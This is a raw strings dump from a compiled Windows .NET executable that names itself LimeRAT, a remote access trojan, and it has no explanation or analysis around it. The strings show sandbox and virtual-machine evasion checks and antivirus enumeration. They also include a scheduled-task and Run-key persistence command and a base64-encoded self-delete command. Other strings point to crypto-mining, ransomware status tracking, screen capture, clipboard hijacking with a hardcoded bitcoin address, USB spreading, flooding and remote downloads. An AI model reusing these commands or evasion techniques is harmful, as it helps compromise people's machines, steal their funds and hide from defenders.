!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v2.0.50727
#Strings
_Closure$__R1-0
$IR12-1
_Lambda$__R12-1
ThreadSafeObjectProvider`1
List`1
$IR13-2
_Lambda$__R13-2
kernel32
Microsoft.Win32
ToInt32
_Lambda$__R2
$VB$NonLocal_2
get_UTF8
<Module>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
EXECUTION_STATE
System.IO
ES_CONTINUOUS
_Closure$__
Dispose__Instance__
Create__Instance__
value__
ProjectData
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
Thread
RijndaelManaged
get_IsAttached
get_Connected
Append
CompareMethod
get_Clipboard
Replace
CreateInstance
get_GetInstance
instance
GetHashCode
set_Mode
FileMode
EnterDebugMode
CompressionMode
CipherMode
SelectMode
FromImage
DrawImage
get_Message
Invoke
GetEnvironmentVariable
get_Available
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
Rectangle
DownloadFile
DeleteFile
IsInRole
WindowsBuiltInRole
AppWinStyle
get_Name
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_UserName
GetProcessesByName
DateTime
get_LastWriteTime
GetType
MethodBase
ConsoleApplicationBase
Dispose
EditorBrowsableState
SetThreadExecutionState
SetApartmentState
Delete
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
EditorBrowsableAttribute
ComVisibleAttribute
StandardModuleAttribute
HideModuleNameAttribute
DebuggerHiddenAttribute
MyGroupCollectionAttribute
m_ThreadStaticValue
DeleteValue
GetObjectValue
GetValue
SetValue
Receive
set_SendBufferSize
set_ReceiveBufferSize
get_Jpeg
System.Threading
add_SessionEnding
NewLateBinding
Encoding
System.Drawing.Imaging
IsLogging
FromBase64String
ToBase64String
CompareString
ToString
GetString
Substring
System.Drawing
ComputeHash
get_ExecutablePath
get_Width
get_Length
StartsWith
TimerCallback
TransformFinalBlock
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
ConditionalCompareObjectNotEqual
System.ComponentModel
LateCall
kernel32.dll
NTdll.dll
coredll.dll
FileStream
GZipStream
MemoryStream
get_Item
System
SymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
ToBoolean
CopyFromScreen
get_PrimaryScreen
System.ComponentModel.Design
AppDomain
get_CurrentDomain
System.IO.Compression
MyApplication
CopyPixelOperation
Interaction
System.Reflection
ManagementObjectCollection
set_Position
Exception
Environ
get_Reason
get_Info
MethodInfo
FileInfo
FileSystemInfo
MemberInfo
ComputerInfo
DirectoryInfo
Bitmap
EndApp
MD5CryptoServiceProvider
StringBuilder
ToInteger
Debugger
ManagementObjectSearcher
SessionEndingEventHandler
System.CodeDom.Compiler
ToUpper
CurrentUser
BitConverter
ServerComputer
MyComputer
ToLower
ClearProjectError
SetProjectError
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
Graphics
System.Diagnostics
get_Bounds
GetMethods
Microsoft.VisualBasic.Devices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
Microsoft.VisualBasic.MyServices
GetInstances
GetDirectories
GetTypes
GetBytes
SocketFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
System.Windows.Forms
Contains
Conversions
SessionEndReasons
RuntimeHelpers
Operators
ManagementClass
FileAccess
Process
System.Net.Sockets
SystemEvents
Exists
Concat
ImageFormat
PixelFormat
AddObject
ManagementBaseObject
ConcatenateObject
ManagementObject
MyProject
Connect
LateGet
LateIndexGet
System.Net
Socket
SystemIdleTimerReset
get_Height
GraphicsUnit
get_Default
ToUpperInvariant
get_Client
WebClient
TcpClient
System.Management
RuntimeEnvironment
Component
get_Current
GetCurrent
ParameterizedThreadStart
Convert
set_SendTimeout
set_ReceiveTimeout
MoveNext
System.Text
GetText
SetText
Client.My
ToArray
set_Key
CreateSubKey
RegistryKey
System.Security.Cryptography
Assembly
LoadLibrary
GetRuntimeDirectory
CreateDirectory
Registry
WindowsIdentity
ClipboardProxy
MyTemplate
11.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
_CorExeMain
mscoree.dll
<'J_]Ds
9(CUc4Oa
S'6zcC
Wb[?Q`_
_VC3u9
cP8dt8
G`ecFai
OUPcNVS$
aL8j_M:B]M;
'7E3WpzNm
R"M^C$
aS=ZjM0
eO9 s8
I]bB<n
Yl? XkB#JjE'6eQ?!^\X
'(">PY>Uc
b,* u1
I[]Z4w
keK4Q_RC*Pck
T'i}Y3=zX5"xW4
|Y55~Q%^
V!adB
VOC\Dcp"
#8E4.;CbB*
eN5_It
[O?^M[\08p
$XwDGTY
mD"1S`n
qnE#]_M88I\a
,("<S0
vL(B~T/J
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
SbieDll.dll
windir
\vboxhook.dll
Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
Microsoft
Windows
Unkown
PROCESSOR_ARCHITECTURE
dd/MM/yyy
Win32_Processor
ProcessorId
Win32_BIOS
SerialNumber
Win32_BaseBoard
Win32_VideoController
Rans-Status
Not encrypted
Not ready
Disabled
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
Regasm
select CommandLine from Win32_Process where Name='{0}'
Regasm.exe
CommandLine
--donate-level=
Minning...
Win32_Processor.deviceid="CPU0"
Core(TM)
Unknow
Software\
:Zone.Identifier
uvT++8AamBJZhc3I5w897JOAd95xsoYzsmpa5Sck+OeJHB2YInf3TEg05tZPOfhS
explorer.exe
AppData
\WinExplorer\
bc1qkrux9qr0mu3ffgysy47lh3mh2638vxeu6vpufu
!PSend
!PStart
Error!
Plugin Error!
length
DownloadString
v0.1.9.2
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'
Software\Microsoft\Windows\CurrentVersion\Run\
Flood!
_USB Error!
_PIN Error!